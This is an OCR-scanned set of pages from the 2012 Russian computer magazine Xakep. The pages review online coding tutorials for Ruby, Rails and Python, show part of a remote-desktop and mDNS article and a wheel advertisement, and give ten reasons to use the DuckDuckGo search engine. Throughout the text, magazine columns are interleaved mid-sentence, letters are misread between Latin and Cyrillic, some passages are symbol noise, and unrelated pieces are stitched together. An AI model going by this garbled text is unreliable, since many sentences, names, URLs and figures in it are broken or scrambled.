соз дается так- п опробуй>>. И ты пробуешь.
ся правильнесть решения. Таким образом, в любой момент можно п онять, что именно н е
Далее объясняется что-то еще,- ты опять
нравится интерактивной системе, какой ре
же сразу проверяешь это в действии. Как
зультат должен быть на выходе, и где в твоем
только зна ни й становится достаточно, тебе
решении спряталась ошибка.
TRY RUBY
.....
.....
r.-"-'~illlmtt,.,..,_..,., J.""_
-а..и...r~-- tllaJ --Vw-'"'• ,./!J
вообще никогда не имел д ело с программиро ванием, t гу гuЬу будеттебе по зубам. Правда,
tryruby.org
в это м случае обучение, вероятно, зай мет чу ть больше времени. Всего нужно пройти восемь
_
Если у тебя был мало-мальский о пыт програм
уроков и справиться с более ч ем пятьюдесят ью
......... ....... ........... ···- ,......._.......... _..._...._
мирования, то эта интерактивная абучалка
задания ми. Пр оект стал еще лучше после того,
""""''-"'"'-··-··..... ,..........,
буква льно за пятнадцать минут позволит тебе
как е г о взяла п од свое крыло уже упомя н утая
пройтись по базовым п он я ти ям языка
Ruby
и понять, что к чему. Впрочем, даже ес ли ты
ТНЕ INTRO ТО RAILS SCREENCAST 1 WISH 1HAD
выше школа
C<>de school.
у .... _
- · - - -" .. ,__
.oll•lw!ototn~
Теперь это практи
чески идеальный реп е титор.
--
убойный скринкаст с говорящим на зван и ем
<< Скринкаст для чайников в
Rails ,
The lntro to Rails Screencast 1Wish 1Had
с которо
го я хотел бы начать са м >> . В 40-минутном
blt.ly/zqLVPH
ролике в самой доходчивой форме рассказы
вается, как исполь зова ть
со циируется с по пулярнейшим фреймв орком
Rails. После это го << Models>>, <<TDD >>, <<Act i ve R ecoгd>>, <<RSpec>>, <<СаруЬага>>, << Paг t ial s>> уже н е буд ут
для пос троения веб-приложений
пугать. Э т о не ед ин ственный скринкаст для
Ка к уже было отмечено, язык
Rails.
Rub y четко Ru by
ас
Оп
Последний п омо г взлететь не одному
слова
начинающих: немало видеоуроков для про
старта п у из Силиконовой д о лины, в том
граммистов самого разного уровня можно
числе и Twitteг'y. Дж еффри Вэй- главный
найти на другом профильнам проекте
редактор сервиса
гailscast s.com.
tutsplus.com-
записал
RAILS FOR ZOMBIES
Downloвd
"""""'""'"'
Записанные на неизменно высоком уровне уроки, приправленные здоровой дозой
railsforzombles.org
юмора, сопровождаются упражнениями,
состав л енными и з си т уа ций , с которыми
После того lи только после тогоiJ как у тебя
каждый день встр ечаются программи сты на
будут необходимые знания
<<ре л ьсах>>. Е сли э т ого курса т ебе окажется
Rai ls
и некоторый
о пыт в созда ни и веб- прил оже ни й, обязатель
мало, то у авторов есть продолжение
но нужно пройти бесплатный курс <<Ре ль с ы
fог ZomЬies
для зомби>> от все той же школы
только за денежку.
Х АКЕР
c<>de school .
2>>,
<< Rails
Atutor1attot •pploa.tюn
Ruby
mf:'ntv.sн\g
оп
Rails
но его можно пройти уже
033
04/159/ 2012
www.epidemz.net
PCZONE
Python Python- один
О
из nоnулярнейших языков
python ·
максимально быстрого nрототиnирования
бывала ситуация, когда нужно было что-то
nрограммирования среди с n ециа ли стов по
сложных информационных систем. Вnрочем,
оnтим и зировать, и каждый раз знания языка
информаЦионной безоnасности. Огромное ко
nрототиnом дело часто не ограничивае тся:
оказывались очень nолезны.
личество nодключаемых библиотек nозволяет
найдется немало nроектов, код которых на
Б о лее того,
быстро nисать сложные сценарии и всnомога
nисан на
серьезные nриложения в качестве скриnтоео
Python,
и которые выдерживаю т
Python
часто встраивают во многие
тельные nриложения. Многие nрофи вообщ е
огромные нагрузки. Изучить этот язык можн о
го языка, чтобы иметь богатые возможности
считают
даже nросто для себя: у меня десятки раз
для создания сценариев.
Python
идеальным инструментом для
ПОПРОБУЙ PYТHONI
надо даже устанавливать интерnретато р. Это
--
очень удобно: любой nрив еденный nример
trypython .org
можно тут же nоnробовать в действии. Однако
Лучший сnособ быстрого старта- nоnр о
Python
бовать онлайн-обучалку
за nравильнопью действий и не nредлаг ает
TN.......,P... ...
на э т ом интерактивность заканчивается : Т гу
Python.
П о инте
задачки для nроверки знан ий . Весь курс со
анало гичным nроектам для
не менее, nозволяет nройти базовый курс
стоит из семи частей !nять по Python и две по lг on P y thonl. Забавно, что сам сервис написан
обучения nрямо в браузе ре. На ком nьютер не
на S il veгlight'e.
JS и Ruby,
но, тем
ОНЛАЙН - РЕПЕТИТОР PYTHON
.......,,..,,_,..
.... .. ........ ..
тривать значения разных структур данных
~
lпеременных, объектов в куче, фреймов
скольких заранее заготовленных сниппетов,
курса по nрограммированию в известной
взятых из учебной программы
американской кузнице nрограммистов М ас
Забавно, что здесь есть не с колько зада чек,
сачусетского технологического института.
которые nредлагают соискателям на долж
Его идея заключается в том, ч тобы визуали
ность программистов. С решениями. Сервис
Python
в
MIT.
~
_.... ___
•••
,,. ~,н,.,
.. , .......... ""''-'"' ···01 ,_
.. ........"'
<oot .. l·(t•~o·-··
'"
,,. ... ,.. -·-•-.cl
...... a ••., .. ao< J
.,.._
"• ·•r:•
••":[::,;
1"'........ 011
.. , ...,,.,._,,.,щ, ,н....,.м
lo• 1 '" tt' oo !l. lo•IAJI
набранный прямо в браузере, или один из не
Забавный сервис был разра ботан в рамках
. . .-.. . . .
_
, .. ..,,....,, .....-.•.................. _ ...... .................................
1
:,:·~: ~:::.::;;-; .;с•
стэкаl. Это может быть произвольный код,
оn 1i n е pytho ntutor.com
~
=~-·-·
никак не nроверяет тв о й код, не с ледит
рактивности сервис си ль но nроигрывает
- ___
_". ... ,_..ooo"•••-N< ........ - .......... ,.,,...llt ......... ......... ,.-.;.......... ..... ..... "-'to<.,..
·-
- / )ffl5;lt710
·~~~~
IAitl • ..,,
.............
1
.. "
:; :;~~:. :el:•. :c.:. .:: ·" '· '''
зировать выполнения сце нар иев, написанных
можно было бы назвать онлайн-отладчиком,
в озможности подключения модулей, выnол
на Pyth oп, позволяя пошагово выполня ть их
однако для выполнения сложных сценар иев
нения 1 / 0-операций и так далее. Кстати, код
!вперед-назад! и на каждом шаге просма-
использовать его уже нельзя из-за отсутствия
проекта nолностью открыт.
У РОКИ
PYTHON
ОТ
должности разработчиков!. Теnерь этот курс
~('l< o~k
rl
GoogloCodiUroiYe!aity
nолностью открыт и бесnлатен. Он включает
cod е .goog le .com/ed u/la ng ua ges/go og 1е python-class/i ndex.html
в себя пошаговые мануалы , видео лекций,
а также много уnражнений для тренировки и закреnления материалов. Первые занятия
давно славится тем, что активно ис
nользует у себя
Python.
В комnании есть даже
касаются базовых nонятий в Python !вроде
строк и списков!, далее- nоследовательно
___.._____ ___.. --··"'.. ___ _ - ·-----------·----·--·-----------·--· ·~
,
",
сnециальный курс, nредназначенный для
освещается разработка nолноценных nри
людей, у которых nока мало оnыта в nрограм
ложений, работающих с файлами, nроцессами
в
мировании !естестве нн о, о н и не работают на
и НТТР-соединениями. Над о сказать, что
сценарию и умещается в два дня.
этот курс проходит по и нт енсивному
ПОПРОБОВАТЬ ТЕХНОЛОГИЮ! Интерактивные обучалки, nозволяющие
к nримеру, nознакомиться с набирающими
быстро nрочувствовать новую технологию,
оборот функциональными языками
nоявляются, как грибы nосле до ж дя . Ни же я
nрограммирования или новомодными
nривожу е ще несколько nодобны х nроектов ,
базами данных .
кото ры е не вошли в сегодняшний обзор,
• Haskell: tгyhaskell . org ; • Scala: simplyscala.com;
но будут очень nол езн ы , если ты хоче шь,
NoSQL
• Eгlang : tryerlang.org; • Cloju г e: try-clo jure.org; • MongoDb: t ry.monqodb.orq; • RedisDb : tr .redis-db.com · • С#: Ьit.ly/A4HR9m; • Язык за nро сов SQL: sql-ex.ru .
ХАКЕР
03~
www.epidemz.net
04/159/2012
MUGELLO - HYPER SILVER
VAIRANO
INDY 500
SILVERSTONE
NARDO
ROTARY FORGED WHEELS
MALLORY
CARTHAGE
VALENCIA
SEPANG
ZOLDER
CADWELL
NURBURGR ING RF
INTERLAGOS RF
МАХ
BROOKLANDS
STOWE
LONDR INA
JARAMA
SNEПERTON
DONIN GTON
WILLOW
STRIP
Visit our website to view the complete line of TSW Wheels
TSW is dedicated to being the world 's premium provider of staggered wheel applications and has more one-piece staggered wheel sizes than any other wheel brand in the world.
www.epidemz.net
Реклама
www.epidemz.net
Открыть Заnуск от 11t·18H~1.,
Configur ation
,
Start Application Session
Open in Window Switch
Start Desktop Session user@testpc rl·lain \lo/i ndO'Л'S Displa':/
Compress to "opera .rar" and email Закреп~п ь в t·1еню "П~'ск"
Configure От прав11Ть
DisaЫe
Выре за ть Кот1ровать
Discoпnect
Start Application Start Desktop
Соз дать ::1рлык Уда Л11ТЬ
Пере11t•1ен ова ть
Open File
r1Je ~\'
Connection
ant@ant-vb fYiain Unix Display
www.epidemz.net
"
start Applteat10n
-
Start Oesktop
~
Нost
Multicast DNS lmDNS) является способом
<< представляя » себя другим участникам сети .
Username
использования привычных программных
Таким образом все машины в сети обновляют
Password
интерфейсов
свой mDNS-кэш и получают информацию и о
DNS внебольши х сетях, где
нет необ х одимости в обычном DNS-cepвepe.
новых хостах/сервисах . Чтобы аннулировать
Проще говоря , использование
свое « nредставление >> !наnример, в случае
mDNS
позволяет клиенту оnределить IР-адрес
выключения машины) хост должен отnравить
х оста без помощи централизованного
геsроnsе - пак е т с
DNS-
TTL
использует зарезервированную з ону
хост, посылает широковещат е льный
Протокол
зaпpoc . Соответствующий хост отвечает на этот заnрос широков е щат е льным ответом ,
mDNS <<. local >>.
mDNS исnользуют такие системы обнаружения сервисов как Bonjouг IApple) и Avahi ILinux) .
SSH
v on port 22
О Verify Identification
=О . По умолчанию
cepвepa . Машина, ищущая конкретный
mDNS-
Via
192. 168.0.4
И!т
) ( Cancel
Р Connect
Ручное добавление сервера для nодключения
ХАКЕР
038
www.epidemz.net
04/159/2012
!Url~
..... ,~
Co•••••:low....ouroi!J
'1J
1!\. -
Connected to server 'testpc' Successfulty logged in as user on testpc. Тhere 1s one other user connected user Тhere 1s one !1ve sesSion: Ma1n W1ndows D1sp!ay
www.epidemz.net
8
PCZONE
Мария « Mifrill» Нефедова lmifri llliJreal.xake p.rul
~~GOOGLE v
ЭАТО&ОИ.
НЕТ>>
Mbl 10 ПРИЧИН
ОБРАТИТЬ ВНИМАНИЕ НА ПОИСКОВИК DUCKDUCKGO.COM Каким поисковиком ты обычно пользуешься?
или
Яндексом? Или, быть может, ты по какой-то причине юзаешь
Biпg? А ведь инструментов для поиска винтернетегораздо
больше, и помимо закрыты х коммерчески х поисковиков,
в
первый раз о таком с лышишь? Я
начинает напрягать. Не надо нам навязывать
тоже. Но ведь так было когда-то и с
G+- мы
Google. DuckDuckGo- это
ную сеть от Google или нет.
гибридный
гикавекие альтернативы . Одна из таки х альтернатив-
OuckGo.com .
Duck-
DuckDuckGo в свою
поисковик , главные черты которого- класс
очередь является классическим поисковиком,
ный поиск , отсутствие поискового спама,
каким был
минимальное количество рекламы [ее можно
развития . И что здорово, - он отлично ищет
Google в самом
начале своего
полностью отключить в настройках) и щепе
информацию! Правда, пока только на англи й
тильное отношение к модному на западе слову
ском языке: с русскоязычным сегментом сети
«pг i vacy>>:
у него явные проблемы. П оисковик уже давно
DuckDuckGo
не следит за пользова
телями, сохраняя их анонимность . Мы нашли
приглянулся гикам из Силиконовой долины .
десять причин, почему его стоит по меньшей
В прошлом году аудитория составляла всего
мере взять на вооружение.
200 000
шпионящи х за каждым твоим шагом, существуют отличные
и сами решим , использовать социаль
человек в день, а в этом сервис уже
перешагнул отметку в
1
1 000 000
посетителей
Это просто поиск . Давно прошли те
ежедневно и, если верить статистике
времена, когда
[ du c kdu ckg o . co m / tгa f f i c . ht m l ), эта цифра
Google был
просто
поисковиком, а на << чистой >> странице
продолжает расти. А с ноября
2011
года
поиска. Сейчас же нас пичкают рекламой
DuckDuckGo стал Linux Mint 12. Это,
и дополнительными сервисам и. Взятый
популярный десктопный дистрибутив
поисковиком nуть на социализациютоже
сегодняшний день .
выдачи аскетично выводились рез у льтаты
поисковиком по умолчанию на минуточку, самый
ХАКЕР
www.epidemz.net
Linux
на
04 /159/ 2012
<<Google следит за тобой. М ы- нет»
о
•
DuckDuck Go
Google tracks you. We don't.
About
Search better at
•
W11fo1mortin~IIN11~
DuckDuck Go
Главная страница
DuckDuckGo аскетична ,
чиста и навевает
мысли о Google.
Во т так продвиг а л с вой пои сковик В айнберг. Этот билборд
Поис ковик уже сегодня может по х вастаться тем , что был
висел в Сан·Франциско, и Гэб ри елу это об х одилось в
удостоен внимания кр у пных изданий .
7 000
$в месяц.
Никакой слежки за пользователями.
ци ю 5М5 и типы зво н ков. Страшно? А ведь это
этого пока небольшого, но гордого поис
Е с ли ве ри ть соз д а т ел ям, т о з д есь
даже не самое скверное. Google может собирать
ковика, в красках повествующий об истории
цар и тпо лн ая а н о нимн ост ь . Н аз в а ни е
не только историют в оих звонков, он также
поиска в целом и о том, почему сбор данных
этой стат ь и взято из глав н о г о лозу н га п роек т а:
ч итаеттвою переписку и знает все о твоих пере
о пользователях- это очень и очень плохо .
2
<<Google следит за тобой. М ы- нет>>. Замечал
движениях с точностьюдо пары метров за
ли ты, как реклама в поисковиках умело
последнюю пару лет. Благодаря синхронизиро·
подстра ив ае т ся по д т е запросы, кото ры е т ы
в ан н ым с Gmail контактам знаеттвоих друзей
делал ранее? Н а сай т е ht t p : Udoпttгa c k . us
и знакомых, а основываясь на подписках
приво д ится отли ч ная д е м о н с т рац ия того, ка к
и запросах к поис к у - знает о твоих интересах.
не и звестно, но сейчас результаты поиска
это п роисхо д и т . Ситуация ста л а особе нн о
А еще знае т о твоих покупках и храниттвои
удивляют своей чистотой и точностью. На
актуал ь ной после того, как Google смен и л свою
документы в Google Docs.
сегодня можно сказать точно, что 5ЕО
политику ко н фи д е н циал ь нос т и. Скажи ч естно,
DuckDuckGo не хранит IР-адреса , не ведет ло
оптимизаторам DuckDuckGo пока по барабану,
ты читал новое соглашен и е о ко н фиде н ц и ал ь
гов пользовательской информации и исполь
и это рад ует.
ности? А меж д у т ем с 1 ма рт а 2012 оно вс т у п ило
зуеткукитолько тогда, ко гда это действи
в силу. Согласно неко т о р ым п у н к т а м, Google
тельно необходи м о. Соз д атель поисковика
в открытую декла р и р ует сбо р телефо н ных
заявляет: <<Duck Duck Go не собирает никакую
логов, то есть номе р а телефонов, номера
личную информацию пользователей и не
телефоно в вы зы в аем ы х або н ен т о в , но м ера д ля
д елится ей. Вот и вся наша политика конфи·
пятидесяти разных источников, включая
переа др есации, д ату и врем я з в о нк ов,
денциальности>> . П о адресу duckduckgo.com /
Yahoo! 5еагсh 8 055, Wikiped ia, Wolfгam Alpha
дл ит ельнос т ь з в о н ков, мар шр у т ную и нф ор м а-
pгivacy.html т ы найдешь настоящий манифест
и собственного поисков о го робота. Одним
Помимо п е речисл ен ног о наличествуют
т о чное время в любом городе мира и так далее .
мн огочислен ны е пол езности, связанные
Например , ответом на зап ро с << агеа of china >>
СИСТЕМА
з
'
В DuckDuckGo практически отсутствует
спам , которым забиты все коммерче ские поисковики. Надолго ли это, увы,
Гибридный поисковик дает больше результатов . Результатыпоиска
DuckDuckGo агрегируются из
GOODIES
Чтобы лучше понять одну из самых прог р есс ивны х фишек пои ско вика-
goodie s -
пре дл а гаем т ебе несколько примеров . Начнем
с математическими выражениями ,
[площадь Китая! будет точное, как в апт е к е:
с технических .
различными формулами, ко нвер тацией, трансформацией и так дал ее, дал ее , дал ее .
<< 3.705 mil l ion mi2 [square m i lesl [world ran k : 4thl , assumiпg china is а соuпtгу >> [3.705 млн .
свой IP :1 . Е с ли же свой собственный
Та кже nоддерживается немало так н азываем ы х
квадратных миль [4-я по величине стран а
IР ' шник тебя не интересует, можешь ввести
казуальных
Запрос
<<ip address>> поможет теб е узнать
в поисков у ю строку любой уже и з вестный
в мире! , ес ли под с ловом << Китай » имелась
goodies:
П о и ск по д атам и фактам. Спр оси у
Du ck·
в виду страна! .
Du ckGo: << deat h date of li nco ln >> [дата смер ти
Реализован поиск п о различным 10, б у дь
сообщит теб е , к какой географич еской точке
Лин ко льна !, и вверху страницы nоисковой
это трекинг-номер п ос ылки [вводишь
IP от но си т ся, а также пока жет ее на ка рте: << 64.2 07.122 .151 is in : Cheyenпe, W yomi пg , Uпited States [8200 21 >>. Для чего нужны goodi es useгag e nt , whois
выдачи ты уви д ишь строку << А пswег:
номер отправл е ния в строку поиск а
Saturday, Apгil 15, 1865 >> [Ответ: суббота, 15 апреля, 18651 . Конечно, есть в Du ck Du ck Go конвертер
и про с то нажима е шь Go! , очень у добно! ,
и им подобны е, объяснять, над еюсь, не
ра зличны х величин и калькулятор , как же
друго е .
нужно.
без них?
Запрос вида
Имеется множество г е ографи ческих
а дрес , скажем ,
64.207.122 .151 , и Du ck DuckGo
межд у народный с танд а ртный номер книги или
ISBN , телефон и многое , много е
Рандомные goodies особенно забавны .
Запрос << heads о г tails >> [орел ли решкаl
<< U+0 153>> даст ответ: <<с hагасt ег 339 : о е - Latin s mallligatuгe о е; Unicode U+015 3; Decimal = 339 ; HTML = &#339;>> .
ies , а также goodies , связа н ны х со временем
н е что иное , как во з можность подбро с ить
и часовыми поя сам и . Кстати, поискови к
виртуа льн ую монетку . А ведь е щ е есть
Для генерации паралей и ключ е вы х фраз
польз уе тся картографическим сервисом
гandom numb eг, гoll die, гando m woгd и даже
OpenStreetMap .
сакрамента льно е- this о г that о г nоп е . Для
=
=
используй << p asswoг d
* woг d s >> ,
гд е • -
* strong >> и « passphгase
любо е цифрово е з нач ение.
Так же можно ге н е рировать uuid, guid .
good-
Возмо жен поиск места на карте по заданны м
х ардкорщиков предлагается вари а нт гo ll
коо рдин атам и по адресам , можно у знать
3d1 2 + 4.
ХАКЕР 04/159/2012
www.epidemz.net
PCZONE словом,DuсkDuсkGо--своеобразная
список Ьапg ' ов доступен здесь: duckduckgo.
Впрочем , нужно заметить, что в случае
оппозиция
com / bang . htm l lпpeдyп режда е м-- он огромен).
формулировки запросов на русском языке поля
и всем коммерческим
<< о тв ет >> ты , скорее всего, не увидишь. У Wolfгam
поисковикам в целом, которая просто не могла
рано или поздно не появиться. Отдельно стоит рассказатьпроiЬапg.Даннаякоманда
Моментальный отве т. Когда в поис-
5
ковике можно набрать <<гап dоm
конкретный товар на <<Амазоне >>. Допу стим, это
triaпgle 1.5 2 3.2>> lпериметртреугольника со с торонами 1.5, 2, 3.2), <<md5 this>> !посчитать md5-хэш для слова <<this>>l и тут же получить
Скажем, тЕ!бе нужно найти какой-либо
к которомуобращается
DuckDuckGo,
с великим и могучим пока не слишком хорошо.
пumЬег>> !случайное число!, <<peгimeteг
позволяет напрямую обращаться к другим пои сковым машинам и к сотням сайтов.
Alpha,
6
поисковика ты можешьлегко отключить показ рекламы, задать
регион, включить
HTTPS по умолча нию ,
часы. Наб ери в поисковой строке « lam azoп
ответ-- это называется
watch >> !или просто «la watch>>), и автоматиче
самых убойных фишек поисковика, и таких
у казать параметры открытия ссылок и даже
ски попадешь на amazoп . com, в уже готовую
goodies действительно мн о г о -- как техниче
на с троить внешний вид
поисковую подборкус часами. Благодаря этой
ских и математико-прогер с к их , так и казуаль
каждый аспект поведения поисковика можно
команде можно легко искать на
ных ! подробнее читай во вр езке ). К слову,
оптимизироватьдля себя, и это приятно.
ltwitteг,
lwikipedia,
lyoutube ,
в благах, репазитариях и на
goodies.
Это одна из
Гибкая настройка . В настройка х
Практически
поискови к по многим вопр оса м с веряется
сотнях дру г их ресурсов. Кстати, также
с Wolfгam
работаютсокращения:
вычислительных алгоритм о в . Благодаряэтому
'g lgoogle), lj limages), lyt
DDG.
Alpha --базой зн а ни й
и набором
Система горячих клавиш . Плох тот
7
ресурс, который в наши дни не
lyoutubel, lwiki и так далее. Дополнять список
есть возможность ввести в с троку конкретный
Ьапg'ов могут и сами пользователи, для э т ого
вопрос и получить на него к о нкр е тный ответ
с этим полный порядок: общаться с сайтом
достаточно заполнить простую форму. Полн ый
прямо на странице, не прох о д я п о с сылкам.
можно вообще без и с пользования мыши или
-
Onlmt Servrces
!s1mplyh~red
о
DuckDuckGo
•
......
Google: !gaccess !gau !gbk !gЬiogs !gbooks (!gb) !gcache !gcal !gde !gdocs (!gd) !gfюance (!gf! stock) !gg roups (!gg) !g1mages (!91 !g1m) !glatest (!gweek !gmonth !gday !g24 !gyear) !gl1nk !glocal! gmail !gmaps (!gm) !gmusiC !gnews (!gn !gnde) !gnz !googleuk (!guk) !gpat !gphotos (!gp) !greader (! gr) !grelated !gscholar (!gsc) !gshoppюg (!gs) !gtranslate (!gt !gturl) !gtrends !gus !g1•ideos (!gv)! gv1ewer (!gvle\V) !gwp !gv-pde !lmgtfy !dw !gas !gbm !gl !gmob !google (!g !gssl) !gplus !gplusp Jobs: !caree rbuilder !jobs !lmkup !monster !reed
поддерживает хоткеи. У
(!sh)
1 l.optop
Maps: !arcg1s !bюgmaps (!bn1aps) !n1apqt1est !openstreetmap (!openstreet !osm) !zemiJel•ld !zun11 Scarch: !bing (!Ь) !Ьiekko !ddg !dogp1le !ecos1a !entire1veb !everyciiCk !goosh !kazau !mamma! myallsearch !redz !seznam !smallsafaГI !spez,fy !start !startpage !swagbucks !у1рру !ask !exalead! fluid1nfo !fuu !gЫast !geega1n !giГ !karnыdecay !ka)•ak !koders !metacrawler !sp !unscatter !1vf1 !yahoo (!у !)•jp) !yandex (!уа !yaen !)•andexm) !)•eah\vay
Р ек л ама в
Du ckDuc kGo. Лег к о отключается
в настройках .
Scarch ( DDG): !anyr !help !safeoff
19460
Computing Jnfo ip address
Scarch (non ·US): !naJdi !soso !)•andex !youdao !ba1du !eks1sozluk !gnfr !opt1mot !)'IIV
map 19460
64.207.122.151
Grography
Scorch
( Р2Р ) : !)•асу (!рее г)
з
!seeks !xdcc
ames st., 02142
useragent
37.771008, ·122.41175
Scarch (Privote): !scroogle (!s) !1xqu1ck
о
populat•on of metro at
Scorch (Rcal ·time): !kurrently !lavva !oneriot !topS)' !evГI !tawlk Social: !tw1tter (!hv !tweet) !123people (!123р) !43thlngs !d1aspora !dmoz !facebook (!fb) !flattr! fonplus !fotolog !foursquare !fГiendster !ggroups !grepl1n !hiS !1dent1Ca !Je ICk !l1nked1n (!li) !myspace! г !shoutltout! veetgrid !\Vink !xanga
whois duckduckgo.con ~о Ylёl 1NhoisAPI • 368798
cap1tal of ch1le
golden ratio 5:?
elevat•on of salt lake ci
U+ 4034
area of chma
unicode ·
distance philly to lond<
Sociol (intl): !gulesider !orkut !skyrock !wleOIVIe Sociol no1vs/links: !del~eious !digg !dllgo !historious !jetsl1de !meneame !metaf1lter (!mefl) !ne\VSI'Ine! pastebln !pinboard (!рЬ) !redd~ !searchyc (!newsyc !hn !hackerne1vs !ус) !stumЫeupon (!stumЬie)! subredd1t !subreddit !thefullwiki (!fullwiki) !wikinews !wykop !xmarks Tools: !ЬiЬisrv !bugmenot (!login) !eggtimer !freenode !geocaching (!geocache) !geonames !gmane! gmap !gookokugo !gopher !1d1oms !kotobank !linguee !local !map !markma1l !oopon !pgp !proxy !qr! random !Гipestat !tюyurl !tld !trademarks !tz !val1date !v1ewpdf !yubnub
1Z0884XV0399906189 9780061353246
1g8gg3Sm1g7123 10 1 ,g
Tools (U RLs): !013 !cache (!cached) !downfor (!updown) !1sgd !1sup (!is1tdown) !longurl !vgd !1vayback (! archive !archived) !weboftrust (!1vot !m)'"Ot) !yinl1nks
e>duckduckgo
Tracking: !capost !dhl !dhlde !dhlgn1 !fedex !1ps !lasersh1p (!laser) !ontrac !package !purolator !sfs !tnt! track !ups !usps
Rt~ndom
newsnow !nzbmatrix (!nzb) !nzbs !reuters !ynews Broadcast: !abcne1vs
!ЬЬс !сЬс
guid epoch 3:38:34 Р М Е
http://Wolframalpha.co g
~ ~
Formult~s
vo lume of а sphere area of
а
trapezoid
yes or no
!cbsnews !cnn !foxnews !msnbc !npr !pbs
)1)
roll die
International: !globeandma1l !globo !heise !lntaiJazeera !locita !redtram !smh !sunt1mes !thereg1ster! thestar
throw dice
Mogazinc: !ch1lango !csmon1tor !econon11St !newsweek !newyorker !roll1ngstone !salon !slate (!slatefr)! telegraph !thenation
roll 3d1 2 + 4
И х д е йствит е льно ОЧЕНЬ много .
Ph ysic:~l Prop~rt i~s
heads or ta1ls this or that or non e
!bang.
uuid
3/15/20 11
random word 7·9
Business: !Ьiznar !Ьioomberg !business1veek !cnbc !fool !forbes !ft !mormngstar !msq !wsj !yfinance (!
Примерно сот а я часть шорткатов
reg exp /(.')/ ddg
random number
random word
Aggregators: !aljazeera ! ар !Ьinsearch !Ьiogs !Ьiogspot !bne1vs !cdt !kickne\Vs !news (!n) !newsmax!
~
pa ss phrase 4 words
12343435 time
ran d 1 10
News
~
(323) 319-6 185
r: duckduckgo v•a tagdef
Tools (fundro ising): !ind1egogo !kickstarter !rockethub
Computing Tools password 15 strong
IDs
density of the earth mass of jupiter gravitatio nal consta nt
throw s diCe
circumferen ce of the
www.epidemz.net
е. ~
radius of the moon
Н ек оторы е вариации
goodie s.
ХАКЕР
042
~
Si010
04 / 159/ 20 12
« Google сле ди т за тобой . Мы - нет>>
тачпада. Н иже - маленькая подсказка.
8
Передвижение по сайту :
Работает по защищенным протоко
лам . У Du ck DuckGo есть короткое
доменное имя ht t p:U ddg .gg [это, к слову, на 4 с имвола короче, чем goo gle.
1' или j - следующий результат; -J., или k - предыдущий результат;
1или h- к поисковой строке; esc- выйти из поисковой строки; t-наверх;
m- к первому результату; 1 или 1-открыть выпадающее меню lb aпg.
Много дополнительных плюшек .
1Q Гики любят
Du ckDuckGo,
поэтому нет
ничего у дивит ель ного в п о явлении
вспомо г ательных инструментов, к оторые
com: l, которое редиректит посетителя на за щищ е нную SS L- вepcи ю сайта - https:// duckduckgo.com.
удобнее. Уже сейчас ес т ь спе циальные
П оисковиком можно пользоваться через Тог.
[другие в разработке!. Поиск м ожно вст роить
Адрес внутри сети - 3g2upl4p q 6kufc4m.oпioп.
п рямо в систе м у с помощью проектов вро д е
м огу т сде лать работу с поисковиком еще мобильные приложения для Aпdг o id и iOS
M ultiSeekeг [ bit. l y/d hЫV F I. Также есть
Открытые результаты: Епtег или 1 или о- открыть подсвеченный
9
результат ил и сразу открыть самый первый;
Ctгi/Cmd+Eпteг - открыть результат на фоно
DDG можно использовать как прокси.
н есколько ад дон ов для популярных браузе
позволяе т зайти на любой сайт через
ров. Создатели даж е подняли чатбота [ye.gg/ chatbo tl , который р або т ает через ХМРР
Команда« !ргоху адрес-сай та>>
[Jabbeг l . Результаты можно получить
вой вкладке;
прокси. Для этой цели DuckDuckGo использу
d- поиск по конкретному сайту [который вы д е лен в результатах!.
ет различные беспла тны е прокси [что, пр авда,
моментально , отправив сооб щ е н ие на а др ес
плохо сказывается на скорости!.
imraddg.gg. ::x:::
РЕТРОСПЕКТИВА принимает. << Это было бы неправильно , в е дь
и доступна любому желающему на
энтузиас та Гэбриела Вайнберга . Лишь
мы некоммерч еская компания> >, - поясняется
lgithub.com/duckduckg о ] .
после получения инвестиций у поисковика
на сайте. Вместо dопаtе 'о в пользоват е лям
Откуда взялось эт о дурацкое название ? Оно
появилось не ско лько постоянны х сотрудников
предлагают активнее нести информ а цию
было выбрано практически случайно . В одном
и собственный офис в американском городе
о
из интервью Гэбриел поя с нил : << На са мом деле
DuckDuckGo-
проект одного единственного
GitHub
техноло гич еско го института IMITI . Поисковик
Du ck DuckGo людям. DuckDuckGo написан на Регl и Ja vaScг ipt с использованием библиотеки YUI. Для
для н е го- дал е ко не первый проект. Его
обслуживания ог ромного колич ес тв а
Во зм ожно, это связано с п о п улярной в США
со ци а льн ую сеть
клиентов используется связка пgiпх ,
д етск ой игрой под на званием
Паоли . Гэбриел- выходец из Массачусетског о
в один прекрасный день оно просто выскочило у меня в голове , и просто мне понравилось >>.
Th e Name s Databa se купила ком пания Uпited Dпliпe за 10 000 000 долларов С ША . Из начально Du ck DuckGo самостоятельно
50
финансировался лично Вайнбергом , но сейчас
собственные сервера, так и мощности Ama zoп
предлагает использ овать
су щ ес твует также и за счет небольшага
ЕС2 . Для х ранения данны х используются
« подакать~еслитранслитерироватьэто
Fa stCG I
и
memcached ,
запущенные FгееВ-
Goose >> .
глаголу << пог у глить >> IGoogle itl, Вайнберг
и Ubuпtu. При этом использ уютс я как
количества рекламы !которую , напоминаем,
Postgг e SOL+bu caг do, СОВ , Solг, BeгkelyDB,
можно отключить] . Пожертвований проект н е
Ча сть исходного кода
Du ck Du ckGo
<< Duck Duck
Кстати , в качестве альтер нативы
53 .
открыта
<< Duck itl,, -
то ес ть
на р у сский, или << поуткать>>, если дословно
п е р е вести
:1.
ДРУГИЕ МАЛОИЗВЕСТНЫЕ ПОИСКОВИКИ
I Ыekko ll М
ix---=-qш_ .ck_
1
HA.R
M!IТeмeпyiiПiolliiЯПOMCIOIIOIICМC T eMI
1 1L _ _ _
Nigma ( нигма.рФ )
Blekko ( Ьiekko.com )
Уа Су lyacy.net )
lxquick (ixquick.com )
За пущен в конце 20 10 года. Идея
Поисковик Уа С у работает по прин
Поисковая система компании
Ру нету тоже ес ть чем похвастать
Blekko проста-невозможно
цип у Р2Р. Х ран е ние поискового
lxquick тоже ставит во главу угла
с я . Nigm a -
соз дать поисковик, который под
индекса и обработка за просо в
анонимность и безопасность
лектуальная метапоисковая
ро сс ийская интел
х одил бы всем, поэтому у каждого
осуществляются не на цен
пользователей . l xquick, как
система, первая кластеризующая
должна быть возможность влиять
тральном сервере, а в распре
и
поисковая система в Рунете .
на результаты поиска. Исполь
деленной сети пиров Fгeewoгld .
формацию ни о за проса х пользо
зует слэштеги для сужения
Присоединиться к сети может
вателей, ни о ни х самих. Кстати,
му индексу, так и по индексам
области поиска . Например , при
любой желающий, достаточно
по утверждениям специалистов
помощи слэштега <</ пews >> можно
лишь установить ПО. Конечно ,
ком пании lxquick, их поисковы е
